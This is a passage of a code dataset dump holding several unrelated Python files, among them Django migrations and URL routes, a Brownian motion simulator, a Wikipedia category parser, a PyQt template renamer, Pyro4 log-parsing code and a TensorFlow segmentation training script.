bases=('recipes.ingredient',),\n ),\n migrations.CreateModel(\n name='RecipeAction',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('comment', models.TextField()),\n ('action', models.ForeignKey(to='recipes.Action')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='RecipePart',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', serialize=False, auto_created=True)),\n ('unit', models.CharField(max_length=100)),\n ('note', models.CharField(max_length=100)),\n ('amount', models.IntegerField()),\n ('ingredient', models.ForeignKey(to='recipes.Ingredient')),\n ('recipe', models.ForeignKey(related_name='recipe_component', to='recipes.Ingredient')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='recipeaction',\n name='recipe',\n field=models.ForeignKey(to='recipes.RecipePart'),\n preserve_default=True,\n ),\n ]\n","sub_path":"recipes/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"236494749","text":"from django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\nfrom main.main_views.bid_detail import BidDetail\nfrom main.main_views.user_dashboard import UserDetail\nfrom main.main_views.translation import (TranslationList,\n TranslationSearch,\n TranslationDetail)\nfrom main.main_views.bid import (BidsView,\n RecentBidsView,\n AddTranslationToBidView,\n GetCart)\n# from main.main_views.tags import TagList, HeaderTagList, SubheaderTagList\n# from main.main_views.admin_dashboard import *\nfrom main.main_views.user_account import UserView\nfrom main.main_views.user_list import UserList\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'auth/me/', UserView.as_view(), name='user_details'),\n\n url(r'^$', 'main.views.api_root', name=\"api-root\"),\n\n url(r'^translation_list/$',\n TranslationList.as_view(),\n name=\"translation_list\"),\n url(r'^translation_search/$',\n TranslationSearch.as_view(),\n name=\"translation_search\"),\n url(r'^translation_detail/(?P[0-9]+)/$',\n TranslationDetail.as_view(),\n name='translation_detail'),\n url(r'^order_detail/(?P[0-9]+)/$',\n BidDetail.as_view(),\n name='order_detail'),\n\n # url(r'^admin_dashboard/items/$',\n # AdminListCreateTranslation.as_view(),\n # name=\"create_item\"),\n # url(r'^admin_dashboard/items/(?P[0-9]+)/$',\n # AdminTranslationDetail.as_view(),\n # name=\"item_detail_update\"),\n # url(r'^admin_dashboard/languages/$',\n # AdminListCreateLanguage.as_view(),\n # name=\"create_language\"),\n # url(r'^admin_dashboard/languages/(?P[0-9]+)/$',\n # AdminLanguageDetail.as_view(),\n # name=\"language_detail_update\"),\n # url(r'^admin_dashboard/status/$',\n # AdminListCreateStatus.as_view(),\n # name=\"create_status\"),\n # url(r'^admin_dashboard/status/(?P[0-9]+)/$',\n # AdminStatusDetail.as_view(),\n # name=\"status_detail_update\"),\n\n url(r'^add_to_cart/',\n AddTranslationToBidView.as_view(),\n name=\"add_to_cart\"),\n url(r'^get_cart/', GetCart.as_view(), name=\"get_cart\"),\n url(r'^user_dashboard/(?P[0-9]+)/$',\n UserDetail.as_view(),\n name=\"user_dashboard\"),\n\n url(r'^allBidsList/', BidsView.as_view(), name=\"all_orders\"),\n url(r'^recentBidsList/', RecentBidsView.as_view(), name=\"recent_orders\"),\n url(r'^UserList/', UserList.as_view(), name=\"user_list\"),\n\n url(r'^media/(?P.*)$',\n 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT}),\n\n url('', include('django.contrib.auth.urls', namespace='auth')),\n url('', include('social.apps.django_app.urls', namespace='social'))\n]\n","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"570794758","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 31 10:53:47 2017\n\n@author: Cornelia Krome\n\nbrownianMotion\n\"\"\"\n\nimport numpy as np\n\n'''\ngeometric brownian motion with drift!\n\nSpezifikationen:\n\n mu=drift factor [Annahme von Risikoneutralitaet]\n sigma: volatility in %\n T: time span\n dt: lenght of steps\n S0: Stock Price in t=0\n W: Brownian Motion with Drift N[0,1] \n'''\n\ndef getManyBMsForManySigma(T, mu, sigmas, S0, dt, seedRange):\n # returns seedRange of BM for each sigma\n S = []\n for sigma in sigmas:\n S.append(getManyBMs(T, mu, sigma, S0, dt, seedRange))\n return S\n\ndef getManyBMs(T, mu, sigma, S0, dt, seedRange):\n # returns many BM (as many as seedRange)\n S = []\n for seed in range(seedRange):\n S.append(brownianMotion(T, mu, sigma, S0, dt, seed))\n return S\n\ndef brownianMotion(T, mu, sigma, S0, dt, seed):\n # return the values of a BM\n N = int(round(T/dt)) + 1\n t = np.linspace(0, T, N)\n if isinstance(seed, int):\n np.random.seed(seed)\n W = np.random.standard_normal(size = N)\n W = np.cumsum(W)*np.sqrt(dt) ### standard brownian motion ###\n W[0] = 0\n X = (mu-0.5*sigma**2)*t + sigma*W \n S = S0*np.exp(X) ### geometric brownian motion ###\n return S\n\nif __name__ == \"__main__\":\n T = 2\n mu = 0.\n sigmas = [0.1, 0.2]\n S0 = 20\n dt = 0.1\n seedRange = 5\n bm = getManyBMsForManySigma(T, mu, sigmas, S0, dt, seedRange)\n","sub_path":"Simulation/methods/brownianMotion.py","file_name":"brownianMotion.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"394034217","text":"# -*- coding: utf-8 -*-\r\nfrom bs4 import BeautifulSoup\r\nimport configparser\r\nimport re\r\n\r\nconfig = configparser.ConfigParser()\r\nconfigPath = './config/parser.cfg'\r\nconfig.read(configPath)\r\n\r\nurlPrefix = config['general']['url_prefix']\r\n\r\ndef extractDictFromLink(link, t):\r\n try: \r\n v = {'name': link['title'].replace('Category:',''), 'url': urlPrefix + link['href'], 'text': link.text, 'type':t}\r\n\r\n except KeyError:\r\n try:\r\n v = {'name': link.text.replace('Category:',''), 'url': 'self', 'text': link.text, 'type':t}\r\n except KeyError:\r\n v = None\r\n \r\n if ('(page does not exist)' in v['name']) or ('redlink=' in v['url']):\r\n v['name'] = v['name'].replace(' (page does not exist)','')\r\n v['url'] = None\r\n \r\n return v\r\n\r\ndef parse(soup):\r\n title = soup.h1.text\r\n if 'Category:' not in title:\r\n print('Not a category page')\r\n return None\r\n \r\n mainarticle = soup.find('div', {'class':'mainarticle'})\r\n if mainarticle:\r\n rm = mainarticle.find('a', {'title': re.compile('Wikipedia:.*')})\r\n if rm:\r\n rm.decompose()\r\n #print(mainarticle)\r\n if mainarticle.b:\r\n if mainarticle.b.a:\r\n mainConcept = extractDictFromLink(mainarticle.b.a, t='category')\r\n else:\r\n mainConcept = {'name': title.replace('Category:',''), 'url':'self', 'text':title.replace('Category:',''), 'type':'category'}\r\n else:\r\n mainConcept = extractDictFromLink(mainarticle.a, t='category')\r\n \r\n else:\r\n mainConcept = {'name': title.replace('Category:',''), 'url':'self', 'text':title.replace('Category:',''), 'type':'category'}\r\n \r\n subcategories = [extractDictFromLink(link.a, t='category') for link in soup.findAll('div', {'class':'CategoryTreeItem'})]\r\n if subcategories != []:\r\n print('extracted ', len(subcategories), ' categories for', title)\r\n return {'main': mainConcept, 'child': subcategories}\r\n else:\r\n if not soup.find('div',{'class':'mw-category'}):\r\n return None\r\n subpages = [extractDictFromLink(link, t='page') for link in soup.find('div',{'class':'mw-category'}).findAll('a')]\r\n print('extracted ', len(subpages), ' pages for', title)\r\n return {'main': mainConcept, 'child': subpages}\r\n\r\n#with open('./data/html/en.wikipedia.org--Category:Biological_evolution.html', 'rb') as f:\r\n# html = f.read()\r\n#soup = BeautifulSoup(html, 'lxml')\r\n#categoryPage = parse(soup)\r\n#print(categoryPage)\r\n","sub_path":"parse/wiki/categoryPage.py","file_name":"categoryPage.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"596417574","text":"#!/usr/bin/env python3\nimport os, sys ,re\nfrom os.path import isfile, join,isdir\nfrom os import listdir\nfrom PyQt5.QtCore import(QSize, pyqtSignal)\nfrom PyQt5.QtWidgets import (QMainWindow, QApplication, QVBoxLayout,QPushButton,QWidget, QHBoxLayout,QAction,qApp, QLineEdit,QFileDialog,QStackedWidget, QLabel)\nfrom PyQt5.QtGui import (QIcon ,QPixmap)\n\nclass MainWindow(QMainWindow):\n\tm_mainwidget=None\n\tprojlist=list()\n\tm_wmainwidget=None \n\tm_wapplywidget=None\n\tm_stackedwidget=None\n\tm_projectname=''\n\tm_variablelist=list()\n\tm_variablelineeditlist=list()\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.m_projectname=sys.argv[1] #TODO check if ther is before !\n\t\tself.ListAndPromptVariableFromCatalog()\n\t\tself.initUI()\n\t\t\n\tdef initUI(self):\n\t\tself.m_stackedwidget=QStackedWidget(self)\n\t\tself.m_mainwidget=QWidget()\n\t\tself.m_mainwidget.setLayout(QVBoxLayout())\n\t\tself.m_mainwidget.layout().addStretch(1)\n\t\tself.m_stackedwidget.addWidget(self.m_mainwidget)\n\t\tfor var in self.m_variablelist:\n\t\t\twvarwidget=QWidget()\n\t\t\twvarwidget.setLayout(QVBoxLayout())\n\t\t\twcommentlabel=QLabel(var[1])\n\t\t\twvarwidget.layout().addWidget(wcommentlabel)\n\t\t\twlineedit=QLineEdit()\n\t\t\tself.m_variablelineeditlist.append(wlineedit)\n\t\t\twvarwidget.layout().addWidget(wlineedit)\n\t\t\tself.m_mainwidget.layout().addWidget(wvarwidget)\n\t\t\tself.m_mainwidget.layout().addStretch(1)\n\t\tself.m_okbutton=QPushButton(\"Ok\")\n\t\tself.m_okbutton.setIcon(QIcon.fromTheme(\"dialog-ok\"))\n\t\tself.m_okbutton.clicked.connect(self.ApplyVariables)\n\t\tself.m_mainwidget.layout().addWidget(self.m_okbutton)\n\t\t\n\t\texitAction = QAction(QIcon.fromTheme('application-exit'), '&Exit', self) \n\t\texitAction.setShortcut('Ctrl+Q')\n\t\texitAction.setStatusTip('Exit application')\n\t\texitAction.triggered.connect(qApp.quit)\n\t\tmenubar = self.menuBar()\n\t\tfileMenu = menubar.addMenu('&File')\n\t\tfileMenu.addAction(exitAction)\n\t\tself.statusBar()\n\t\tself.setWindowTitle('Creating project '+self.m_projectname)\n\t\tself.setWindowIcon(QIcon.fromTheme(\"applications-development\"))\n\t\tself.showMaximized()\t\n\t\tself.setCentralWidget(self.m_stackedwidget)\t\t\t\n\tdef ParseFoldersRecursively(self,folder,recursive):\n\t\tlistoffiles=[f for f in listdir(folder) if isfile(join(folder,f))]\n\t\tlistofdirs=[f for f in listdir(folder) if isdir(join(folder,f))]\n\t\t#Change content of file\n\t\tfor f in listoffiles:\n\t\t\tif \"applyname.py\" in f :\n\t\t\t\tcontinue\n\t\t\tif \"variablecatalog.txt\" in f:\n\t\t\t\tcontinue\n\t\t\t\n\t\t\twith open(f, \"r\",encoding=\"utf-8\") as sources:\n\t\t\t\tlines = sources.readlines()\n\t\t\twith open(f, \"w\",encoding=\"utf-8\") as sources:\n\t\t\t\tfor line in lines:\n\t\t\t\t\tfor v in self.m_variablelist:\n\t\t\t\t\t\tfind=v[0]\n\t\t\t\t\t\treplace=v[2]\n\t\t\t\t\t\tline=re.sub(find, replace, line)\n\t\t\t\t\tsources.write(line)\t\n\t\t\tnewname=re.sub(r'project_name',self.m_projectname,f)\n\t\t\tos.renames(f,newname)\n\t\tif recursive:\n\t\t\tfor f in listofdirs:\n\t\t\t\tParseFoldersRecursively(join(folder,f),recursive)\n\t\treturn\n\tdef ListAndPromptVariableFromCatalog(self):\n\t\twith open(\"variablecatalog.txt\") as f: #This conserve the \\n at en of lines\n\t\t\tcontent = [line.rstrip('\\n') for line in open(\"variablecatalog.txt\")]\t#while this approach does not\n\t\t\tfor line in content:\n\t\t\t\telement=line.split('=')\n\t\t\t\tif (len(element)==2):\n\t\t\t\t\tprint((element[0],element[1]))\n\t\t\t\t\tself.m_variablelist.append((element[0],element[1]))\n\t\tprint(self.m_variablelist)\n\t\treturn\n\tdef ApplyVariables(self):\n\t\tindex=0\n\t\tfor v in self.m_variablelineeditlist:\n\t\t\tif v.text()==\"\":\n\t\t\t\treturn #TODO issue error if \n\t\t\telse:\n\t\t\t\tself.m_variablelist[index]=(self.m_variablelist[index][0],self.m_variablelist[index][1],v.text())\n\t\t\tindex+=1\n\t\tself.ParseFoldersRecursively('.',True)\n\t\t\t#TODO put the rest of you code here\n\t\t\nif __name__ == '__main__':\n\tapp = QApplication(sys.argv)\n\tex = MainWindow()\n\tsys.exit(app.exec_())\n\n\n\n","sub_path":"applyname.py","file_name":"applyname.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"13942160","text":"from noteStruct.log import Log\nfrom enum import Enum\n\n\nclass State(Enum):\n # 數字是為了根據 getState 在呼叫 checkstatefunction 的順序,要回傳什麼 State\n error = -2\n init = -1\n empty = 0\n newStart = 6\n newShift = 7\n headProp = 8\n secProp = 9\n element = 10\n eleProp = 11\n txt = 4\n txtPreProp = 5\n txtStart = 1\n txtWriting = 3\n txtEnd = 2\n\n\nclass VerifySyntax(Log):\n def __init__(self):\n super().__init__()\n self.validNextState = {\n State.error: [],\n State.empty: [],\n State.init: [\n State.newStart\n ],\n State.newStart: [\n State.newShift, State.headProp, State.txt,\n State.element, State.secProp\n ],\n State.newShift: [\n State.newStart\n ],\n State.headProp: [\n State.headProp, State.newStart\n ],\n State.secProp: [\n State.secProp, State.element\n ],\n State.element: [\n State.eleProp\n ],\n State.eleProp: [\n State.eleProp, State.element, State.txt, State.newStart\n ],\n State.txt: [\n State.txtPreProp, State.txtStart\n ],\n State.txtPreProp: [\n State.txtPreProp, State.txtStart\n ],\n State.txtStart: [\n State.txtWriting\n ],\n State.txtWriting: [\n State.txtWriting, State.txtEnd\n ],\n State.txtEnd: [\n State.element, State.eleProp, State.newStart\n ]\n }\n self.mark = {\n State.newStart: ['###'],\n State.newShift: ['*'],\n State.headProp: ['title', 'theme', 'music', 'imgDir', 'transDef', 'transSpd'],\n State.secProp: ['trans'],\n State.element: ['img', 'vdo'],\n State.eleProp: ['src', 'size', 'loc', 'rot', 'frg'],\n State.txt: ['txt'],\n 'txtBoundary': '---'\n }\n # findStateFunction 有順序,所以用 array 而非 dictionary\n self.findStateFunction = [\n self.isEmpty,\n self.isTxtStart, self.isTxtEnd,\n self.isTxtWriting, self.isTxt, self.isTxtPreProp,\n self.isNewStart, self.isNewShift,\n self.isHeadProp, self.isSecProp, self.isElement, self.isEleProp\n ]\n\n self.lineNo = 0\n self.thisState = State.init\n\n ###################################################################\n # main method\n\n def getAndVerifyState(self, line):\n self.lineNo += 1\n newState = self.getState(line)\n if newState is State.empty:\n self._debugLineAndState(line, State.empty)\n return State.empty\n else:\n self.thisState = self.checkValid(newState)\n self._debugLineAndState(line, self.thisState)\n return self.thisState\n\n def getLineNo(self):\n return self.lineNo\n\n def getMark(self):\n return self.mark\n\n ###################################################################\n # other method\n\n def checkValid(self, newState):\n if newState in self.validNextState[self.thisState]:\n return newState\n return State.error\n\n def getState(self, line):\n portion = line.split()\n i = 0\n for findState in self.findStateFunction:\n if findState(portion):\n return State(i)\n i += 1\n\n return State.error\n\n def isEmpty(self, portion):\n return True if len(portion) == 0 \\\n else False\n\n def isNewStart(self, portion):\n return True if portion[0][0:3] in self.mark[State.newStart] \\\n else False\n\n def isNewShift(self, portion):\n return True if portion[0][0] in self.mark[State.newShift] \\\n else False\n\n def isHeadProp(self, portion):\n return True if portion[0] in self.mark[State.headProp] \\\n else False\n\n def isSecProp(self, portion):\n return True if portion[0] in self.mark[State.secProp] \\\n else False\n\n def isElement(self, portion):\n return True if portion[0] in self.mark[State.element] \\\n else False\n\n def isEleProp(self, portion):\n return True if portion[0] in self.mark[State.eleProp] \\\n else False\n\n def isTxt(self, portion):\n return True if portion[0] in self.mark[State.txt] \\\n else False\n\n def isTxtPreProp(self, portion):\n if self.isEleProp(portion):\n tmpState = self.checkValid(State.txtPreProp)\n return True if tmpState is not State.error \\\n else False\n\n def isTxtStart(self, portion):\n if self.isTxtBoundary(portion):\n tmpState = self.checkValid(State.txtStart)\n return True if tmpState is not State.error \\\n else False\n\n def isTxtWriting(self, portion):\n tmpState = self.checkValid(State.txtWriting)\n return True if tmpState is not State.error \\\n else False\n\n def isTxtEnd(self, portion):\n if self.isTxtBoundary(portion):\n tmpState = self.checkValid(State.txtEnd)\n return True if tmpState is not State.error \\\n else False\n\n def isTxtBoundary(self, portion):\n return True if portion[0][0:3] in self.mark['txtBoundary'] \\\n else False\n\n ###################################################################\n # private\n\n def _debugLineAndState(self, line, state):\n self.logger.debug(line + '\\n\\t' + str(self.lineNo) + '\\t' + state.name)\n\n","sub_path":"noteStruct/verifySyntax.py","file_name":"verifySyntax.py","file_ext":"py","file_size_in_byte":5723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"430948734","text":"import torch\nimport time\nM = 10000\nN = 10000\nEPOCH = 20\nx = torch.randn(M, N)\ny = x.cuda()\nprint(x.shape)\n\nconvert_time = 0.\ncalculate_time = 0.\nfor i in range(EPOCH):\n # operation time\n start = time.time()\n y += 1\n y *= 0.99\n end =time.time()\n calculate_time += (end-start)\n\n # comvert time\n start = time.time()\n x = y.cpu()\n end = time.time()\n convert_time += (end-start)\n\nprint('total calculate time: %.3f'%calculate_time)\nprint('total convert time: %.3f'%convert_time)\n# test on NVIDIA 1080Ti, Core i7\n# output: \n# torch.Size([10000, 10000])\n# total calculate time: 0.002\n# total convert time: 3.947\n\n","sub_path":"others/15 cuda2cpu_time_test.py","file_name":"15 cuda2cpu_time_test.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"539907452","text":"# This is the code that visits the warehouse.\nfrom __future__ import print_function\nimport sys\nimport os\nimport time\n\nimport Pyro4\nimport Pyro4.util\n\nif sys.version_info < (3, 0):\n input = raw_input\n\nsys.excepthook = Pyro4.util.excepthook\n\nclass Proses(object):\n def __init__(self):\n self.filenya = os.listdir(\"../filenya/.\")\n self.list1 = self.filenya[((len(self.filenya)/2)):]\n self.list2 = self.filenya[:(len(self.filenya)/2)]\n\n def baca1(self, Log):\n for files in self.list1:\n print(files)\n for line in open(\"../filenya/\"+files).xreadlines():\n cek = line.split()\n cek = \" \".join(cek[4:])\n Log.hitung(cek)\n\n def baca2(self, Log):\n for files in self.list2:\n print(files)\n for line in open(\"../filenya/\"+files).xreadlines():\n cek = line.split()\n cek = \" \".join(cek[4:])\n Log.hitung(cek)\n\n def ambil(self, Log):\n return Log.setor()\n\ndef main():\n Log1 = Pyro4.Proxy(\"PYRONAME:log.satu\")\n Log2 = Pyro4.Proxy(\"PYRONAME:log.dua\")\n\n pro1 = Proses()\n pro2 = Proses()\n\n tstart = time.time()\n\n pro1.baca1(Log1)\n pro2.baca2(Log2)\n hasil1 = pro1.ambil(Log1)\n hasil2 = pro2.ambil(Log2)\n\n sortparse = Pyro4.Proxy(\"PYRONAME:log.sort\")\n hasil = sortparse.sortkan(hasil1, hasil2)\n\n i = 0\n while i < 10:\n print(hasil[i])\n i = i + 1\n\n tend = time.time()\n print(\"Total elapsed time: %d msec\" % ((tend-tstart)*1000))\n\nif __name__==\"__main__\":\n main()\n\n","sub_path":"cluster/Pyro4/boot log parser/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"1630757","text":"\"\"\"Module which defines TaskFactory class and related methods.\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\n__all__ = [\"TaskFactory\"]\n\nfrom builtins import object\n\nimport lsst.log as lsstLog\n\n_LOG = lsstLog.Log.getLogger(__name__)\n\n\nclass TaskFactory(object):\n \"\"\"Class instantiating super-tasks.\n\n Parameters\n ----------\n taskLoder : TaskLoader\n Instance of task loader responsible for imports of task classes.\n \"\"\"\n def __init__(self, taskLoader):\n self.taskLoader = taskLoader\n\n def loadTaskClass(self, taskName):\n \"\"\"Locate and import SuperTask class.\n\n Returns tuple of task class and its full name, `None` is returned\n for both if loading fails.\n\n Parameters\n ----------\n taskName : `str`\n Name of the SuperTask class, interpretation depends entirely on\n activator, e.g. it may or may not include dots.\n\n Returns\n -------\n taskClass : `type`\n SuperTask class object, or None on failure.\n taskName : `str`\n Full task class name including package and module, or None on\n failure.\n\n Raises\n ------\n `ImportError` is raised if task classes cannot be imported.\n `TypeError` is raised if imported task is not a SuperTask.\n \"\"\"\n\n # load the class, this will raise ImportError on failure\n taskClass, fullTaskName, taskKind = self.taskLoader.loadTaskClass(taskName)\n if taskKind != 'SuperTask':\n raise TypeError(\"Task class {} is not a SuperTask\".format(fullTaskName))\n\n return taskClass, fullTaskName\n\n def makeTask(self, taskClass, config, overrides, butler):\n \"\"\"Create new SuperTask instance from its class.\n\n Parameters\n ----------\n taskClass : type\n SuperTask class.\n config : `pex.Config` or None\n Configuration object, if ``None`` then use task-defined\n configuration class to create new instance.\n overrides : `ConfigOverrides` or None\n Configuration overrides, this should contain all overrides to be\n applied to a default task config, including camera-specific,\n obs-package specific, and possibly command-line overrides.\n butler :\n Data butler instance.\n\n Returns\n -------\n Instance of a SuperTask class or None on errors.\n\n Raises\n ------\n Any exceptions that are raised by SuperTask constructor or its\n configuration class are propagated back to caller.\n \"\"\"\n\n # configuration\n if config is None:\n config = taskClass.ConfigClass()\n if overrides:\n overrides.applyTo(config)\n elif overrides is not None:\n _LOG.waring(\"Both config and overrides are specified for task %s, overrides are ignored\",\n taskClass.__name__)\n\n # make task instance\n task = taskClass(config=config, butler=butler)\n\n return task\n","sub_path":"python/lsst/pipe/supertask/taskFactory.py","file_name":"taskFactory.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"599464709","text":"import tensorflow as tf\nimport argparse\nimport glob\nimport os\nfrom model import (\n ConvolutionalSegmentationFirst256, ConvolutionalMultiLabelFirst256,\n ConvolutionalEncoderFirst256, ConvolutionalSegmentationModel,\n ConvolutionalSegmentationModel3D, ConvolutionalSegmentationModelRadiomics,\n VGGModel,ResnetV2Segmentation)\nimport utils\nimport numpy as np\nimport pickle\nfrom copy import deepcopy\nimport pprint\n\n\n# STRUCTURE_CLASS = utils.LUNG_CLASSES\nSTRUCTURE_CLASS = utils.STRUCTURE_CLASS\n\n\n\ndef update_segmentation_metrics(current_metrics, metrics):\n for k, v in metrics['losses'].items():\n metrics['losses'][k] = v + current_metrics['losses'][k]\n\n segmentation = metrics['accuracy']['segmentation']\n current_segmentation = current_metrics['accuracy']['segmentation']\n for k, v in segmentation.items():\n segmentation[k] = (v[0] + current_segmentation[k][0], v[1] + current_segmentation[k][1])\n\n return metrics\n\n\ndef normalize_metrics(metrics, example_count):\n metrics = deepcopy(metrics)\n\n for k, v in metrics['losses'].items():\n metrics['losses'][k] = v / example_count\n\n segmentation = metrics['accuracy']['segmentation']\n for k, v in segmentation.items():\n segmentation[k] = v[0] / v[1] if v[1] > 0 else float(\"-inf\")\n\n return metrics\n\n\ndef init_metrics(classes):\n metrics = {}\n\n metrics['losses'] = { 'segmentation': 0.0}\n\n metrics['accuracy'] = {\n 'segmentation': {k: (0.0, 0) for k, v in classes}}\n\n return metrics\n\n\ndef compute_jacard(preds, mask, classes):\n result = {}\n for i, (k, v) in enumerate(classes):\n positive_preds = (preds == (i + 1))\n positive_gt = (mask == (i + 1))\n total_pixels = np.sum(\n np.logical_or(positive_preds, np.squeeze(positive_gt)),\n axis=(1, 2))\n matched_pixels = np.sum(\n np.logical_and(positive_preds, np.squeeze(positive_gt)),\n axis=(1, 2))\n result[k] = (np.sum(matched_pixels), np.sum(total_pixels))\n return result\n\n\n\nclass RadiomicsData(object):\n def get_tensors(self, serialized_example):\n feature_map = {\n 'height': tf.FixedLenFeature([], dtype=tf.int64, default_value=-1),\n 'width': tf.FixedLenFeature([], dtype=tf.int64, default_value=-1),\n 'image': tf.VarLenFeature(dtype=tf.string),\n 'mask': tf.VarLenFeature(dtype=tf.string),\n 'classes': tf.VarLenFeature(dtype=tf.string),\n 'scan_id': tf.VarLenFeature(dtype=tf.string),\n 'slice_id': tf.VarLenFeature(dtype=tf.string),\n 'xs': tf.VarLenFeature(dtype=tf.string),\n 'ys': tf.VarLenFeature(dtype=tf.string)}\n features = tf.parse_single_example(serialized_example, feature_map)\n example = {\n 'height': tf.to_int32(features['height']),\n 'width': tf.to_int32(features['width'])}\n\n input_shape = (256, 256) + (7,)\n example['image'] = tf.decode_raw(features['image'].values[0], tf.float64)\n example['image'] = tf.reshape(example['image'], input_shape)\n example['image'] = tf.cast(example['image'], tf.float32)\n example['image'] = tf.slice(example['image'], [0, 0, 2], [-1, -1, 3])\n\n example['mask'] = tf.decode_raw(features['mask'].values[0], tf.float64)\n example['mask'] = tf.reshape(example['mask'], (256, 256, 1))\n example['mask'] = tf.cast(example['mask'], tf.float32)\n\n example['scan_id'] = features['scan_id']\n example['slice_id'] = features['slice_id']\n example['classes'] = tf.decode_raw(features['classes'].values, tf.int32)\n\n example['classes'] = tf.reshape(example['classes'], [2])\n\n mean_image = tf.reduce_mean(example['image'], axis=[0,1,2])\n example['image'] = example['image'] - tf.reshape(mean_image, [1, 1, 1])\n print(example['image'])\n\n\n return example\n\n\nclass RadiomicsData3D(object):\n def get_tensors(self, serialized_example):\n feature_map = {\n 'height': tf.FixedLenFeature([], dtype=tf.int64, default_value=-1),\n 'width': tf.FixedLenFeature([], dtype=tf.int64, default_value=-1),\n 'image': tf.VarLenFeature(dtype=tf.string),\n 'mask': tf.VarLenFeature(dtype=tf.string),\n 'classes': tf.VarLenFeature(dtype=tf.string),\n 'scan_id': tf.VarLenFeature(dtype=tf.string),\n 'slice_id': tf.VarLenFeature(dtype=tf.string),\n 'xs': tf.VarLenFeature(dtype=tf.string),\n 'ys': tf.VarLenFeature(dtype=tf.string)}\n features = tf.parse_single_example(serialized_example, feature_map)\n example = {\n 'height': tf.to_int32(features['height']),\n 'width': tf.to_int32(features['width'])}\n\n input_shape = (256, 256) + (7,)\n example['image'] = tf.decode_raw(features['image'].values[0], tf.float64)\n example['image'] = tf.reshape(example['image'], input_shape)\n example['image'] = tf.cast(example['image'], tf.float32)\n\n example['mask'] = tf.decode_raw(features['mask'].values[0], tf.float64)\n example['mask'] = tf.reshape(example['mask'], (256, 256, 1))\n example['mask'] = tf.cast(example['mask'], tf.float32)\n\n example['scan_id'] = features['scan_id']\n example['slice_id'] = features['slice_id']\n example['classes'] = tf.decode_raw(features['classes'].values, tf.int32)\n\n example['classes'] = tf.reshape(example['classes'], [2])\n\n return example\n\n\nclass LungData(object):\n def get_tensors(self, serialized_example):\n feature_map = {\n 'height': tf.FixedLenFeature([], dtype=tf.int64, default_value=-1),\n 'width': tf.FixedLenFeature([], dtype=tf.int64, default_value=-1),\n 'image': tf.VarLenFeature(dtype=tf.string),\n 'mask': tf.VarLenFeature(dtype=tf.string),\n 'classes': tf.VarLenFeature(dtype=tf.string),\n 'scan_id': tf.VarLenFeature(dtype=tf.string),\n 'slice_id': tf.VarLenFeature(dtype=tf.string),\n 'xs': tf.VarLenFeature(dtype=tf.string),\n 'ys': tf.VarLenFeature(dtype=tf.string)}\n features = tf.parse_single_example(serialized_example, feature_map)\n example = {\n 'height': tf.to_int32(features['height']),\n 'width': tf.to_int32(features['width'])}\n\n input_shape = (512, 512) + (1,)\n example['image'] = tf.decode_raw(features['image'].values[0], tf.float64)\n example['image'] = tf.reshape(example['image'], input_shape)\n example['image'] = tf.cast(example['image'], tf.float32)\n\n example['mask'] = tf.decode_raw(features['mask'].values[0], tf.float64)\n example['mask'] = tf.reshape(example['mask'], (512, 512, 1))\n example['mask'] = tf.cast(example['mask'], tf.float32)\n\n example['scan_id'] = features['scan_id']\n example['slice_id'] = features['slice_id']\n example['classes'] = tf.decode_raw(features['classes'].values, tf.int32)\n\n example['classes'] = tf.reshape(example['classes'], [2])\n\n return example\n\n\n\ndata_providers = {'lung': LungData,\n 'radiomics': RadiomicsData,\n 'radiomics_3d': RadiomicsData3D,\n 'radiomics_first': RadiomicsData,\n 'radiomics_resnet': RadiomicsData}\n\nmodels_map = {'lung': ConvolutionalSegmentationModel,\n 'radiomics': VGGModel,\n 'radiomics_3d': ConvolutionalSegmentationModel3D,\n 'radiomics_first': ConvolutionalSegmentationFirst256,\n 'radiomics_resnet': ResnetV2Segmentation}\n\nif '__main__' == __name__:\n parser = argparse.ArgumentParser(description='Convert to dataset.')\n parser.add_argument(\n '--data_dir', type=str, required=True,\n help='Train tf records prefix.')\n parser.add_argument(\n '--model_dir', type=str, required=True,\n help='Model directory.')\n parser.add_argument(\n '--batch_size', type=int, required=False, default=4,\n help='Batch size.')\n parser.add_argument(\n '--max_iters', type=int, required=False, default=100000,\n help='Max model iterations.')\n parser.add_argument(\n '--checkpoint', type=str, required=False, default=None,\n help='Checkpoint to restore.')\n parser.add_argument(\n '--ignore_missing_vars', action='store_true', required=False, default=None,\n help='Ignore missing vars')\n parser.add_argument(\n '--sampling', type=int, required=False, default=None,\n help='Sample with dropout ')\n parser.add_argument(\n '--model_variation', type=str, required=False, default='lung',\n choices=list(models_map.keys()),\n help='Model type to train (classification or regression).')\n parser.add_argument(\n 